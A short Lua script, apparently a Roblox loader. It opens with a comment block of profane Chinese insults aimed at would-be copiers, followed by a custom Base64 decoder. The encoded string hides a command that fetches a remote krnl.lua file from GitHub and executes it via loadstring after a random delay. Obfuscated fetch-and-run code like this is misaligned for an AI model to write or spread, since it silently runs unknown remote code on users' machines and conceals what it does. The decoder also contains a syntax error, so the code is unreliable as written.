--[[你个傻逼还想盗我的东西，你他妈是不是骂死了？还想看我的链接，你的父母是不是s完了

😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂
]]
-- 自定义Base64解码器
local function b64d(s)
    local r = ""
    local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    local m = {}
    for i=1,64 do m[b:sub(i,i)] = i-1 end
    
    s = s:gsub("%s+", "")
    for i=1, #s, 4 do
        local n = m[s:sub(i,i)]*262144 + (m[s:sub(i+1,i+1)]or0)*4096 + (m[s:sub(i+2,i+2)]or0)*64 + (m[s:sub(i+3,i+3)]or0)
        r = r..string.char(math.floor(n/65536)%256, math.floor(n/256)%256, n%256)
    end
    return r
end

-- 安全执行加密代码
local function run(enc)
    local code = b64d(enc)  -- 解码
    local func, err = loadstring(code)  -- 加载
    if func then func() end  -- 执行
end

-- 你的Base64加密脚本 (替换这里)
local myScript = "bG9hZHN0cmluZyhnYW1lOkh0dHBHZXQoImh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9NUDAwTi9NUC9yZWZzL2hlYWRzL21haW4va3JubC5sdWEiKSkoKQ=="

-- 延迟1-3秒后执行
delay(math.random(1, 3), function()
    run(myScript)
end)
